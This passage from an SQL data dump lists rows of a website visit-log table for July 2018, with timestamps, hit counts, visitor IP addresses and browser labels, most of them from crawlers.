,0,'54.36.148.96','other'),(274401,1531707609,1,1,0,0,'54.36.148.29','other'),(274402,1531707797,1,1,0,0,'54.36.148.52','other'),(274403,1531708003,1,1,0,0,'54.36.148.131','other'),(274404,1531708195,1,1,0,0,'54.36.149.72','other'),(274405,1531708344,2,2,0,0,'92.113.189.235','chrome'),(274406,1531708449,1,1,0,0,'157.55.39.233','other'),(274407,1531708710,1,1,0,0,'54.36.149.4','other'),(274408,1531709878,1,1,0,0,'54.36.149.78','other'),(274409,1531710076,1,1,0,0,'54.36.148.234','other'),(274410,1531710317,1,1,0,0,'54.36.148.194','other'),(274411,1531710412,1,1,0,0,'54.36.148.231','other'),(274412,1531710472,1,1,0,0,'54.36.148.172','other'),(274413,1531710705,1,1,0,0,'54.36.148.63','other'),(274414,1531710887,1,1,0,0,'54.36.148.31','other'),(274415,1531710930,1,1,0,0,'54.36.149.90','other'),(274416,1531711077,2,2,0,0,'54.36.148.254','other'),(274417,1531711092,1,1,0,0,'54.36.149.39','other'),(274418,1531711296,1,1,0,0,'54.36.149.27','other'),(274419,1531711324,1,1,0,0,'54.36.149.78','other'),(274420,1531711396,1,1,0,0,'54.36.149.91','other'),(274421,1531711454,1,1,0,0,'54.36.148.50','other'),(274422,1531711672,1,1,0,0,'54.36.149.63','other'),(274423,1531712264,1,1,0,0,'54.36.148.216','other'),(274424,1531712349,1,1,0,0,'54.36.148.204','other'),(274425,1531712425,77,77,0,0,'144.76.186.38','other'),(274426,1531712463,1,1,0,0,'54.36.148.127','other'),(274427,1531712556,1,1,0,0,'216.244.66.241','other'),(274428,1531712624,1,1,0,0,'54.36.148.236','other'),(274429,1531712665,1,1,0,0,'54.36.149.97','other'),(274430,1531712915,1,1,0,0,'54.36.148.58','other'),(274431,1531712937,1,1,0,0,'8.29.198.27','other'),(274432,1531712992,1,1,0,0,'54.36.149.27','other'),(274433,1531713790,1,1,0,0,'54.36.148.16','other'),(274434,1531714004,1,1,0,0,'54.36.148.56','other'),(274435,1531714086,1,1,0,0,'54.36.148.22','other'),(274436,1531714114,1,1,0,0,'54.36.148.255','other'),(274437,1531714174,1,0,1,0,'66.249.69.163',''),(274438,1531714286,1,1,0,0,'54.36.148.93','other'),(274439,1531714344,1,1,0,0,'157.55.39.233','other'),(274440,1531714375,1,1,0,0,'54.36.148.223','other'),(274441,1531714763,1,1,0,0,'54.36.148.105','other'),(274442,1531714876,1,1,0,0,'54.36.148.87','other'),(274443,1531714965,1,1,0,0,'54.36.148.96','other'),(274444,1531715111,1,1,0,0,'54.36.149.91','other'),(274445,1531715317,1,1,0,0,'54.36.148.126','other'),(274446,1531715466,1,1,0,0,'54.36.149.62','other'),(274447,1531715588,1,1,0,0,'54.36.148.191','other'),(274448,1531715636,1,1,0,0,'54.36.149.16','other'),(274449,1531716168,1,1,0,0,'54.36.148.23','other'),(274450,1531716223,1,1,0,0,'54.36.148.208','other'),(274451,1531716343,1,1,0,0,'54.36.148.79','other'),(274452,1531716514,1,1,0,0,'54.36.148.201','other'),(274453,1531716543,1,1,0,0,'8.29.198.27','other'),(274454,1531716545,2,0,2,0,'66.249.69.163',''),(274455,1531716676,1,1,0,0,'54.36.148.138','other'),(274456,1531716790,1,1,0,0,'54.36.148.212','other'),(274457,1531716883,1,1,0,0,'54.36.148.73','other'),(274458,1531716897,1,1,0,0,'54.36.148.27','other'),(274459,1531716994,1,1,0,0,'54.36.148.151','other'),(274460,1531717194,1,1,0,0,'54.36.148.230','other'),(274461,1531717204,1,1,0,0,'54.36.148.139','other'),(274462,1531717348,1,1,0,0,'54.36.148.253','other'),(274463,1531717403,1,1,0,0,'54.36.148.31','other'),(274464,1531717508,1,1,0,0,'54.36.148.109','other'),(274465,1531717512,1,1,0,0,'54.36.148.247','other'),(274466,1531717597,1,1,0,0,'37.53.227.42','firefox'),(274467,1531717647,1,1,0,0,'54.36.149.88','other'),(274468,1531717923,1,1,0,0,'95.134.74.240','chrome'),(274469,1531717995,1,1,0,0,'54.36.148.27','other'),(274470,1531718183,2,2,0,0,'162.210.196.98','other'),(274471,1531718262,1,1,0,0,'54.36.148.41','other'),(274472,1531718460,2,2,0,0,'54.36.148.237','other'),(274473,1531718724,1,1,0,0,'54.36.149.97','other'),(274474,1531718806,1,1,0,0,'54.36.148.139','other'),(274475,1531719143,1,1,0,0,'66.249.69.163','chrome'),(274476,1531719144,2,2,0,0,'40.77.167.143','other'),(274477,1531719154,1,1,0,0,'54.36.148.130','other'),(274478,1531719248,1,1,0,0,'54.36.148.187','other'),(274479,1531719542,1,1,0,0,'54.36.149.76','other'),(274480,1531720053,4,4,0,0,'216.244.66.241','other'),(274481,1531720158,1,1,0,0,'54.36.149.81','other'),(274482,1531720279,1,1,0,0,'54.36.149.9','other'),(274483,1531720383,1,1,0,0,'54.36.148.87','other'),(274484,1531720923,2,2,0,0,'54.36.148.246','other'),(274485,1531721378,1,1,0,0,'54.36.149.95','other'),(274486,1531721599,1,1,0,0,'54.36.148.153','other'),(274487,1531721770,1,1,0,0,'103.21.180.38','firefox'),(274488,1531721786,1,1,0,0,'54.36.149.92','other'),(274489,1531721895,1,1,0,0,'91.196.177.46','chrome'),(274490,1531721930,3,3,0,0,'91.196.178.78','chrome'),(274491,1531722070,1,1,0,0,'54.36.148.231','other'),(274492,1531722230,1,1,0,0,'54.36.148.239','other'),(274493,1531722233,1,1,0,0,'54.36.148.190','other'),(274494,1531722714,2,2,0,0,'91.196.178.169','chrome'),(274495,1531722737,1,1,0,0,'54.36.149.65','other'),(274496,1531723050,1,1,0,0,'178.94.246.205','chrome'),(274497,1531723387,1,1,0,0,'54.36.148.39','other'),(274498,1531723396,2,2,0,0,'216.244.66.241','other'),(274499,1531723533,1,1,0,0,'54.36.148.106','other'),(274500,1531723780,1,1,0,0,'8.29.198.27','other'),(274501,1531723816,1,1,0,0,'54.36.148.70','other'),(274502,1531724074,1,1,0,0,'54.36.148.55','other'),(274503,1531724121,1,1,0,0,'178.95.66.69','chrome'),(274504,1531724804,1,1,0,0,'54.36.148.136','other'),(274505,1531724834,4,4,0,0,'148.251.195.14','other'),(274506,1531724884,1,1,0,0,'54.36.148.220','other'),(274507,1531725058,1,1,0,0,'54.36.149.2','other'),(274508,1531725079,1,1,0,0,'77.111.247.54','chrome'),(274509,1531725614,1,1,0,0,'91.196.178.103','chrome'),(274510,1531725626,1,1,0,0,'54.36.149.32','other'),(274511,1531725666,1,1,0,0,'54.36.149.78','other'),(274512,1531725707,1,1,0,0,'91.196.178.79','chrome'),(274513,1531725724,1,1,0,0,'54.36.148.208','other'),(274514,1531725860,2,2,0,0,'216.244.66.241','other'),(274515,1531725926,1,1,0,0,'54.36.148.62','other'),(274516,1531725944,1,1,0,0,'54.36.149.6','other'),(274517,1531726060,1,1,0,0,'54.36.148.35','other'),(274518,1531726089,1,1,0,0,'91.196.178.78','firefox'),(274519,1531726172,1,1,0,0,'54.36.149.72','other'),(274520,1531726436,1,1,0,0,'46.211.99.253','other'),(274521,1531726588,1,1,0,0,'54.36.149.79','other'),(274522,1531726648,1,1,0,0,'54.36.149.4','other'),(274523,1531726761,1,1,0,0,'54.36.148.120','other'),(274524,1531726859,1,1,0,0,'54.36.148.103','other'),(274525,1531726896,1,1,0,0,'54.36.148.196','other'),(274526,1531726900,1,1,0,0,'54.36.149.17','other'),(274527,1531727380,1,1,0,0,'8.29.198.25','other'),(274528,1531727406,2,2,0,0,'91.196.178.78','chrome'),(274529,1531727786,1,1,0,0,'54.36.149.59','other'),(274530,1531727917,1,1,0,0,'95.163.255.93','other'),(274531,1531728079,1,1,0,0,'54.36.149.81','other'),(274532,1531728295,1,1,0,0,'54.36.148.158','other'),(274533,1531728596,2,2,0,0,'91.124.182.170','firefox'),(274534,1531728932,1,1,0,0,'54.36.148.33','other'),(274535,1531728934,1,1,0,0,'54.36.148.55','other'),(274536,1531729609,1,1,0,0,'54.36.149.9','other'),(274537,1531729836,1,1,0,0,'46.211.157.220','other'),(274538,1531729870,1,1,0,0,'54.36.148.183','other'),(274539,1531729878,1,1,0,0,'54.36.149.35','other'),(274540,1531730064,1,1,0,0,'54.36.148.93','other'),(274541,1531730071,1,1,0,0,'54.36.149.102','other'),(274542,1531730364,2,2,0,0,'130.180.216.249','chrome'),(274543,1531730452,1,1,0,0,'54.36.148.144','other'),(274544,1531730513,1,1,0,0,'54.36.148.30','other'),(274545,1531730578,1,1,0,0,'54.36.148.214','other'),(274546,1531730628,1,1,0,0,'54.36.149.60','other'),(274547,1531731166,1,1,0,0,'54.36.149.5','other'),(274548,1531731360,1,1,0,0,'54.36.148.73','other'),(274549,1531731435,1,1,0,0,'54.36.149.65','other'),(274550,1531731449,1,1,0,0,'54.36.148.91','other'),(274551,1531731526,1,1,0,0,'216.244.66.241','other'),(274552,1531731556,1,1,0,0,'54.36.148.126','other'),(274553,1531731628,1,1,0,0,'54.36.149.92','other'),(274554,1531731748,1,1,0,0,'54.36.148.130','other'),(274555,1531731798,1,1,0,0,'54.36.149.63','other'),(274556,1531731970,1,1,0,0,'54.36.149.72','other'),(274557,1531732220,1,1,0,0,'37.53.159.48','chrome'),(274558,1531732717,1,1,0,0,'54.36.149.97','other'),(274559,1531732868,1,1,0,0,'54.36.148.202','other'),(274560,1531733044,1,1,0,0,'54.36.148.73','other'),(274561,1531733371,1,1,0,0,'37.9.113.110','other'),(274562,1531733458,1,1,0,0,'54.36.148.204','other'),(274563,1531733640,1,1,0,0,'141.8.142.74','other'),(274564,1531733781,1,1,0,0,'216.244.66.241','other'),(274565,1531733943,1,1,0,0,'54.36.148.187','other'),(274566,1531734043,1,1,0,0,'54.36.148.85','other'),(274567,1531734069,1,1,0,0,'54.36.148.226','other'),(274568,1531734336,2,2,0,0,'91.196.178.78','firefox'),(274569,1531734515,1,1,0,0,'54.36.148.162','other'),(274570,1531734621,1,1,0,0,'8.29.198.27','other'),(274571,1531735118,1,1,0,0,'54.36.148.230','other'),(274572,1531735179,1,1,0,0,'54.36.148.207','other'),(274573,1531735306,1,1,0,0,'54.36.149.44','other'),(274574,1531735406,1,1,0,0,'40.77.167.63','other'),(274575,1531735585,1,1,0,0,'216.244.66.241','other'),(274576,1531735913,1,1,0,0,'54.36.149.78','other'),(274577,1531735999,2,2,0,0,'141.8.142.74','other'),(274578,1531736021,1,1,0,0,'54.36.149.45','other'),(274579,1531736283,1,1,0,0,'54.36.148.131','other'),(274580,1531736468,1,1,0,0,'54.36.148.170','other'),(274581,1531736616,1,1,0,0,'91.196.178.133','firefox'),(274582,1531736859,1,1,0,0,'54.36.148.177','other'),(274583,1531737208,1,1,0,0,'54.36.148.212','other'),(274584,1531737246,1,1,0,0,'40.77.167.63','other'),(274585,1531737276,1,1,0,0,'54.36.148.195','other'),(274586,1531737326,1,1,0,0,'54.36.148.163','other'),(274587,1531737422,1,1,0,0,'54.36.148.145','other'),(274588,1531737460,1,1,0,0,'54.36.149.27','other'),(274589,1531737511,60,60,0,0,'157.55.39.233','other'),(274590,1531737576,55,55,0,0,'207.46.13.210','other'),(274591,1531737580,1,1,0,0,'54.36.148.114','other'),(274592,1531737631,75,75,0,0,'40.77.167.143','other'),(274593,1531737725,1,1,0,0,'54.36.148.234','other'),(274594,1531737809,1,1,0,0,'54.36.148.160','other'),(274595,1531738077,1,1,0,0,'54.36.148.77','other'),(274596,1531738125,1,1,0,0,'54.36.148.125','other'),(274597,1531738168,2,2,0,0,'216.244.66.241','other'),(274598,1531738216,1,1,0,0,'8.29.198.27','other'),(274599,1531738337,1,1,0,0,'54.36.149.107','other'),(274600,1531738559,1,1,0,0,'54.36.148.70','other'),(274601,1531738757,1,1,0,0,'176.15.231.136','msie'),(274602,1531738934,1,1,0,0,'54.36.148.150','other'),(274603,1531739013,1,1,0,0,'141.8.142.74','other'),(274604,1531739552,1,1,0,0,'54.36.148.34','other'),(274605,1531739692,1,1,0,0,'54.36.148.182','other'),(274606,1531739789,1,1,0,0,'54.36.149.90','other'),(274607,1531739805,1,1,0,0,'54.36.148.131','other'),(274608,1531739912,1,1,0,0,'54.36.149.69','other'),(274609,1531739937,1,1,0,0,'54.36.148.68','other'),(274610,1531740282,1,1,0,0,'54.36.148.195','other'),(274611,1531740436,1,1,0,0,'54.36.149.82','other'),(274612,1531740637,1,1,0,0,'54.36.148.194','other'),(274613,1531740675,1,1,0,0,'54.36.148.113','other'),(274614,1531740744,1,0,1,0,'66.249.69.169',''),(274615,1531741023,1,1,0,0,'178.154.171.88','other'),(274616,1531741305,1,1,0,0,'54.36.149.106','other'),(274617,1531741662,1,1,0,0,'54.36.149.95','other'),(274618,1531741682,1,1,0,0,'54.36.148.90','other'),(274619,1531741737,1,1,0,0,'91.124.182.170','firefox'),(274620,1531741874,3,3,0,0,'144.76.166.14','other'),(274621,1531741951,1,1,0,0,'54.36.149.11','other'),(274622,1531742202,1,1,0,0,'54.36.148.81','other'),(274623,1531742293,1,1,0,0,'54.36.148.218','other'),(274624,1531742328,1,1,0,0,'40.77.167.63','other'),(274625,1531742391,3,3,0,0,'195.10.210.70','chrome'),(274626,1531742416,1,1,0,0,'91.196.178.55','chrome'),(274627,1531742583,1,1,0,0,'54.36.148.146','other'),(274628,1531742588,1,1,0,0,'54.36.148.49','other'),(274629,1531742661,1,1,0,0,'195.211.62.153','firefox'),(274630,1531742663,1,1,0,0,'54.36.148.74','other'),(274631,1531742670,1,1,0,0,'54.36.148.147','other'),(274632,1531742693,1,1,0,0,'37.9.113.182','other'),(274633,1531742808,2,2,0,0,'216.244.66.241','other'),(274634,1531742881,1,1,0,0,'54.36.148.130','other'),(274635,1531743089,1,1,0,0,'54.36.148.234','other'),(274636,1531743091,4,4,0,0,'91.196.178.78','chrome'),(274637,1531743150,1,1,0,0,'31.13.113.85','other'),(274638,1531743157,1,1,0,0,'31.13.124.80','other'),(274639,1531743158,1,1,0,0,'31.13.113.196','other'),(274640,1531743175,1,1,0,0,'66.220.156.22','other'),(274641,1531743273,1,1,0,0,'91.196.178.175','chrome'),(274642,1531743471,1,1,0,0,'109.229.18.15','chrome'),(274643,1531743631,1,1,0,0,'54.36.148.171','other'),(274644,1531743663,1,1,0,0,'54.36.148.20','other'),(274645,1531743707,1,1,0,0,'54.36.148.219','other'),(274646,1531743854,1,1,0,0,'54.36.149.87','other'),(274647,1531743860,1,1,0,0,'40.77.167.63','other'),(274648,1531743916,1,1,0,0,'82.207.49.106','other'),(274649,1531743998,1,1,0,0,'54.36.148.170','other'),(274650,1531744110,1,1,0,0,'54.36.148.125','other'),(274651,1531744242,1,1,0,0,'46.211.96.56','other'),(274652,1531744595,1,1,0,0,'54.36.149.64','other'),(274653,1531744613,1,1,0,0,'54.36.148.156','other'),(274654,1531744923,1,1,0,0,'54.36.148.10','other'),(274655,1531745125,1,1,0,0,'46.201.252.235','chrome'),(274656,1531745237,1,1,0,0,'54.36.149.42','other'),(274657,1531745340,1,1,0,0,'91.196.178.81','firefox'),(274658,1531745387,1,1,0,0,'54.36.149.72','other'),(274659,1531745450,1,1,0,0,'8.29.198.27','other'),(274660,1531745459,1,1,0,0,'54.36.148.245','other'),(274661,1531745557,2,2,0,0,'91.196.178.78','chrome'),(274662,1531745616,1,1,0,0,'54.36.148.169','other'),(274663,1531745787,1,1,0,0,'54.36.148.48','other'),(274664,1531745878,1,1,0,0,'54.36.148.219','other'),(274665,1531745914,1,1,0,0,'54.36.148.82','other'),(274666,1531746070,1,1,0,0,'54.36.148.217','other'),(274667,1531746114,1,1,0,0,'54.36.148.243','other'),(274668,1531746384,1,1,0,0,'37.53.159.48','chrome'),(274669,1531746794,1,1,0,0,'54.36.148.224','other'),(274670,1531746923,1,1,0,0,'54.36.148.239','other'),(274671,1531746969,1,1,0,0,'141.8.142.74','other'),(274672,1531747255,1,1,0,0,'54.36.148.13','other'),(274673,1531747256,1,1,0,0,'54.36.148.84','other'),(274674,1531747319,1,1,0,0,'54.36.148.35','other'),(274675,1531747625,1,1,0,0,'54.36.149.50','other'),(274676,1531747865,1,1,0,0,'54.36.148.98','other'),(274677,1531748040,17,17,0,0,'148.251.195.14','other'),(274678,1531748064,1,1,0,0,'54.36.149.61','other'),(274679,1531748234,2,2,0,0,'91.196.178.78','chrome'),(274680,1531748236,1,1,0,0,'141.8.142.74','other'),(274681,1531748308,1,1,0,0,'54.36.149.6','other'),(274682,1531748415,1,1,0,0,'54.36.148.238','other'),(274683,1531748448,1,1,0,0,'54.36.148.50','other'),(274684,1531748464,1,1,0,0,'54.36.148.95','other'),(274685,1531748470,3,3,0,0,'216.244.66.241','other'),(274686,1531748473,1,1,0,0,'54.36.148.221','other'),(274687,1531748486,1,1,0,0,'54.36.148.128','other'),(274688,1531748520,1,1,0,0,'91.124.182.170','firefox'),(274689,1531748562,1,1,0,0,'54.36.149.1','other'),(274690,1531748657,1,1,0,0,'178.92.54.90','chrome'),(274691,1531748680,1,1,0,0,'54.36.149.85','other'),(274692,1531748734,1,1,0,0,'95.163.255.116','other'),(274693,1531748754,1,1,0,0,'95.163.255.119','other'),(274694,1531748776,1,1,0,0,'95.163.255.105','other'),(274695,1531748828,1,1,0,0,'95.163.255.109','other'),(274696,1531748912,1,1,0,0,'54.36.148.218','other'),(274697,1531749024,1,1,0,0,'178.154.171.88','other'),(274698,1531749050,1,1,0,0,'8.29.198.25','other'),(274699,1531749119,1,1,0,0,'93.170.97.108','chrome'),(274700,1531749145,1,1,0,0,'54.36.148.74','other'),(274701,1531749395,1,1,0,0,'37.73.55.144','chrome'),(274702,1531749654,1,1,0,0,'51.255.65.46','other'),(274703,1531749838,1,1,0,0,'54.36.149.20','other'),(274704,1531749909,1,1,0,0,'54.36.149.69','other'),(274705,1531750048,1,1,0,0,'40.77.167.63','other'),(274706,1531750085,1,1,0,0,'95.133.37.2','firefox'),(274707,1531750163,1,1,0,0,'91.196.179.25','chrome'),(274708,1531750419,1,1,0,0,'54.36.149.70','other'),(274709,1531750544,1,1,0,0,'54.36.148.119','other'),(274710,1531750613,1,1,0,0,'141.8.142.74','other'),(274711,1531750624,1,1,0,0,'54.36.148.217','other'),(274712,1531750689,1,1,0,0,'54.36.148.46','other'),(274713,1531750760,1,1,0,0,'216.244.66.241','other'),(274714,1531750902,1,1,0,0,'54.36.148.230','other'),(274715,1531751050,1,1,0,0,'54.36.149.17','other'),(274716,1531751097,1,1,0,0,'54.36.149.25','other'),(274717,1531751192,1,1,0,0,'54.36.149.90','other'),(274718,1531751308,1,1,0,0,'54.36.148.14','other'),(274719,1531751591,1,1,0,0,'54.36.148.223','other'),(274720,1531751910,1,1,0,0,'54.36.148.168','other'),(274721,1531752025,1,1,0,0,'54.36.148.235','other'),(274722,1531752066,1,1,0,0,'40.77.167.63','other'),(274723,1531752108,1,1,0,0,'54.36.149.53','other'),(274724,1531752335,1,1,0,0,'54.36.148.169','other'),(274725,1531752497,1,1,0,0,'180.76.15.162','other'),(274726,1531752530,1,1,0,0,'54.36.148.251','other'),(274727,1531752552,2,2,0,0,'216.244.66.241','other'),(274728,1531752820,1,1,0,0,'54.36.149.3','other'),(274729,1531752931,1,1,0,0,'54.36.148.190','other'),(274730,1531753283,1,1,0,0,'54.36.148.137','other'),(274731,1531753419,1,1,0,0,'54.36.149.56','other'),(274732,1531753454,1,1,0,0,'54.36.148.217','other'),(274733,1531753528,1,1,0,0,'54.36.148.180','other'),(274734,1531753931,1,1,0,0,'54.36.149.39','other'),(274735,1531754117,1,1,0,0,'54.36.149.37','other'),(274736,1531754161,1,1,0,0,'216.244.66.241','other'),(274738,1531754208,1,1,0,0,'54.36.149.85','other'),(274739,1531754410,1,1,0,0,'54.36.148.183','other'),(274740,1531754559,1,1,0,0,'54.36.148.138','other'),(274741,1531754812,1,1,0,0,'54.36.148.152','other'),(274742,1531754868,1,1,0,0,'91.196.178.85','firefox'),(274743,1531755498,3,3,0,0,'216.244.66.241','other'),(274744,1531755683,1,1,0,0,'54.36.149.96','other'),(274745,1531755731,1,1,0,0,'180.76.15.155','other'),(274746,1531755748,1,1,0,0,'31.13.113.178','chrome'),(274747,1531755837,1,1,0,0,'54.36.148.16','other'),(274748,1531756040,1,1,0,0,'188.230.43.254','other'),(274749,1531756086,1,1,0,0,'54.36.149.99','other'),(274750,1531756304,1,1,0,0,'8.29.198.27','other'),(274751,1531756712,1,1,0,0,'93.72.131.1','chrome'),(274752,1531756888,1,1,0,0,'216.244.66.241','other'),(274753,1531756926,1,1,0,0,'54.36.148.218','other'),(274754,1531757153,1,1,0,0,'54.36.148.216','other'),(274755,1531757282,1,1,0,0,'54.36.148.222','other'),(274756,1531757924,1,1,0,0,'178.154.171.88','other'),(274757,1531757928,1,1,0,0,'141.8.142.74','other'),(274758,1531758095,1,1,0,0,'54.36.149.62','other'),(274759,1531758189,1,1,0,0,'40.77.167.143','other'),(274760,1531758401,1,1,0,0,'54.36.149.59','other'),(274761,1531758503,1,1,0,0,'40.77.167.6','other'),(274762,1531758542,1,1,0,0,'216.244.66.241','other'),(274763,1531758614,1,1,0,0,'188.230.43.254','other'),(274764,1531758686,1,1,0,0,'54.36.148.132','other'),(274765,1531759128,1,1,0,0,'54.36.148.153','other'),(274766,1531759426,1,1,0,0,'54.36.148.221','other'),(274767,1531759455,1,1,0,0,'54.36.148.85','other'),(274768,1531759509,1,1,0,0,'54.36.148.88','other'),(274769,1531759657,2,2,0,0,'216.244.66.241','other'),(274770,1531759685,1,1,0,0,'54.36.148.175','other'),(274771,1531759740,1,1,0,0,'54.36.148.177','other'),(274772,1531759863,1,1,0,0,'188.230.43.254','other'),(274773,1531759903,1,1,0,0,'8.29.198.25','other'),(274774,1531759929,1,1,0,0,'54.36.148.145','other'),(274775,1531760545,1,1,0,0,'157.55.39.233','other'),(274776,1531760574,1,1,0,0,'54.36.149.61','other'),(274777,1531760593,1,1,0,0,'54.36.148.80','other'),(274778,1531760598,1,1,0,0,'54.36.149.57','other'),(274779,1531760816,1,1,0,0,'54.36.149.43','other'),(274780,1531761076,1,1,0,0,'178.154.171.88','other'),(274781,1531761092,1,1,0,0,'54.36.148.79','other'),(274782,1531761157,1,1,0,0,'54.36.148.192','other'),(274783,1531761252,2,2,0,0,'141.8.142.74','other'),(274784,1531761286,1,1,0,0,'54.36.149.68','other'),(274785,1531761434,2,2,0,0,'216.244.66.241','other'),(274786,1531761824,1,1,0,0,'54.36.149.24','other'),(274787,1531762038,1,1,0,0,'188.230.43.254','other'),(274788,1531762070,1,1,0,0,'54.36.148.33','other'),(274789,1531762113,1,1,0,0,'54.36.149.1','other'),(274790,1531762430,1,1,0,0,'54.36.149.53','other'),(274791,1531762448,8,8,0,0,'78.46.176.21','other'),(274792,1531762522,1,1,0,0,'54.36.149.19','other'),(274793,1531762706,1,1,0,0,'54.36.149.59','other'),(274794,1531762923,1,1,0,0,'176.15.19.105','chrome'),(274795,1531763273,1,1,0,0,'54.36.148.127','other'),(274796,1531763850,3,3,0,0,'216.244.66.241','other'),(274797,1531764196,1,1,0,0,'54.36.149.80','other'),(274798,1531764258,1,1,0,0,'54.36.149.61','other'),(274799,1531764455,1,1,0,0,'54.36.149.91','other'),(274800,1531764565,1,1,0,0,'54.36.148.69','other'),(274801,1531764871,1,1,0,0,'54.36.148.81','other'),(274802,1531764974,1,1,0,0,'54.36.148.49','other'),(274803,1531765037,2,2,0,0,'91.196.178.187','chrome'),(274804,1531765274,1,1,0,0,'54.36.148.65','other'),(274805,1531765787,1,1,0,0,'54.36.148.126','other'),(274806,1531766013,1,1,0,0,'178.154.171.88','other'),(274807,1531766114,1,1,0,0,'54.36.149.78','other'),(274808,1531766216,1,1,0,0,'54.36.148.246','other'),(274809,1531766366,1,1,0,0,'54.36.148.22','other'),(274810,1531766370,1,1,0,0,'54.36.149.93','other'),(274811,1531766427,1,1,0,0,'54.36.148.86','other'),(274812,1531766647,1,1,0,0,'54.36.148.158','other'),(274813,1531766750,1,1,0,0,'54.36.148.33','other'),(274814,1531766942,1,1,0,0,'54.36.149.107','other'),(274815,1531767140,1,1,0,0,'8.29.198.25','other'),(274816,1531767154,1,1,0,0,'216.244.66.241','other'),(274817,1531767283,1,1,0,0,'141.8.142.74','other'),(274818,1531767401,1,1,0,0,'54.36.148.211','other'),(274819,1531767549,1,1,0,0,'157.55.39.233','other'),(274820,1531767843,1,1,0,0,'95.163.255.119','other'),(274821,1531767850,1,1,0,0,'95.163.255.104','other'),(274822,1531768059,1,1,0,0,'46.42.162.98','chrome'),(274823,1531768086,2,2,0,0,'92.113.189.235','chrome'),(274824,1531768222,1,1,0,0,'54.36.149.67','other'),(274825,1531768467,1,1,0,0,'54.36.148.157','other'),(274826,1531768755,1,1,0,0,'54.36.148.255','other'),(274827,1531768845,1,1,0,0,'54.36.149.103','other'),(274828,1531768918,1,1,0,0,'54.36.149.70','other'),(274829,1531768949,1,1,0,0,'54.36.148.122','other'),(274830,1531769280,1,1,0,0,'54.36.148.82','other'),(274831,1531769674,1,1,0,0,'54.36.148.120','other'),(274832,1531769986,1,1,0,0,'216.244.66.241','other'),(274833,1531770144,1,1,0,0,'54.36.148.179','other'),(274834,1531770333,1,1,0,0,'87.250.224.46','other'),(274835,1531770748,1,1,0,0,'8.29.198.27','other'),(274836,1531770782,1,1,0,0,'54.36.148.160','other'),(274837,1531770853,1,1,0,0,'54.36.148.137','other'),(274838,1531770986,1,1,0,0,'216.244.66.241','other'),(274839,1531771050,1,1,0,0,'54.36.148.11','other'),(274840,1531771099,1,1,0,0,'54.36.149.45','other'),(274841,1531771105,1,1,0,0,'54.36.149.25','other'),(274842,1531771447,2,2,0,0,'54.36.149.11','other'),(274843,1531771495,1,1,0,0,'54.36.148.105','other'),(274844,1531771613,1,1,0,0,'54.36.149.43','other'),(274845,1531771715,1,1,0,0,'54.36.148.95','other'),(274846,1531772475,1,1,0,0,'54.36.149.28','other'),(274847,1531772709,1,1,0,0,'54.36.148.187','other'),(274848,1531772847,1,1,0,0,'54.36.149.19','other'),(274849,1531773165,1,1,0,0,'178.154.171.88','other'),(274850,1531773424,1,1,0,0,'91.196.178.42','chrome'),(274851,1531773608,1,1,0,0,'54.36.148.209','other'),(274852,1531773932,1,1,0,0,'54.36.148.176','other'),(274853,1531774026,1,1,0,0,'54.36.148.214','other'),(274854,1531774091,1,1,0,0,'216.244.66.241','other'),(274855,1531774230,1,1,0,0,'54.36.148.96','other'),(274856,1531774844,1,1,0,0,'46.211.106.225','chrome'),(274857,1531775010,2,2,0,0,'141.8.142.74','other'),(274858,1531775160,1,1,0,0,'54.36.149.88','other'),(274859,1531775170,1,1,0,0,'54.36.149.46','other'),(274860,1531775261,1,1,0,0,'216.244.66.241','other'),(274861,1531775360,1,1,0,0,'54.36.148.31','other'),(274862,1531775431,1,1,0,0,'54.36.149.85','other'),(274863,1531775659,2,2,0,0,'54.36.149.102','other'),(274864,1531775843,1,1,0,0,'54.36.148.49','other'),(274865,1531775894,1,1,0,0,'54.36.149.91','other'),(274866,1531776041,1,1,0,0,'54.36.149.25','other'),(274867,1531776249,1,1,0,0,'54.36.148.139','other'),(274868,1531776411,1,1,0,0,'54.36.149.4','other'),(274869,1531776827,1,0,1,0,'66.249.69.89',''),(274870,1531777176,1,1,0,0,'54.36.148.244','other'),(274871,1531777232,1,1,0,0,'54.36.149.10','other'),(274872,1531777362,1,1,0,0,'54.36.148.128','other'),(274873,1531777507,1,1,0,0,'91.209.11.236','other'),(274874,1531777527,1,1,0,0,'54.36.148.33','other'),(274875,1531777592,1,0,1,0,'66.249.69.169',''),(274876,1531777720,1,1,0,0,'216.244.66.241','other'),(274877,1531777768,1,0,1,0,'66.249.69.167',''),(274878,1531777836,1,1,0,0,'54.36.149.46','other'),(274879,1531777974,1,1,0,0,'8.29.198.27','other'),(274880,1531778032,1,1,0,0,'54.36.148.133','other'),(274881,1531778037,1,1,0,0,'54.36.148.158','other'),(274882,1531778041,1,1,0,0,'54.36.149.21','other'),(274883,1531778110,1,1,0,0,'54.36.148.218','other'),(274884,1531778199,1,1,0,0,'54.36.149.53','other'),(274885,1531778252,1,1,0,0,'54.36.148.113','other'),(274886,1531778265,1,1,0,0,'54.36.149.6','other'),(274887,1531778335,1,1,0,0,'54.36.148.48','other'),(274888,1531778648,1,1,0,0,'54.36.148.19','other'),(274889,1531778709,1,1,0,0,'54.36.149.37','other'),(274890,1531779080,1,1,0,0,'54.36.148.147','other'),(274891,1531779082,1,1,0,0,'54.36.148.229','other'),(274892,1531779133,1,1,0,0,'54.36.148.80','other'),(274893,1531779196,1,1,0,0,'54.36.148.246','other'),(274894,1531779323,2,2,0,0,'216.244.66.241','other'),(274895,1531779405,1,1,0,0,'87.250.224.46','other'),(274896,1531779742,1,1,0,0,'141.8.142.74','other'),(274897,1531779928,1,1,0,0,'54.36.148.216','other'),(274898,1531780314,1,1,0,0,'54.36.148.192','other'),(274899,1531780350,1,1,0,0,'216.244.66.241','other'),(274900,1531780449,1,1,0,0,'54.36.148.62','other'),(274901,1531780798,1,1,0,0,'54.36.148.75','other'),(274902,1531781122,1,1,0,0,'54.36.148.147','other'),(274903,1531781273,1,1,0,0,'141.8.142.74','other'),(274904,1531781338,1,1,0,0,'52.53.201.78','chrome'),(274905,1531781348,1,1,0,0,'54.36.149.42','other'),(274906,1531781400,1,1,0,0,'54.36.148.67','other'),(274907,1531781447,1,1,0,0,'54.36.148.218','other'),(274908,1531781579,1,1,0,0,'8.29.198.26','other'),(274909,1531781645,1,1,0,0,'54.36.148.141','other'),(274910,1531781767,1,1,0,0,'54.36.148.43','other'),(274911,1531781815,1,1,0,0,'54.36.148.207','other'),(274912,1531781848,1,1,0,0,'54.36.149.83','other'),(274913,1531781917,1,1,0,0,'54.36.148.48','other'),(274914,1531781947,2,2,0,0,'216.244.66.241','other'),(274915,1531782599,1,1,0,0,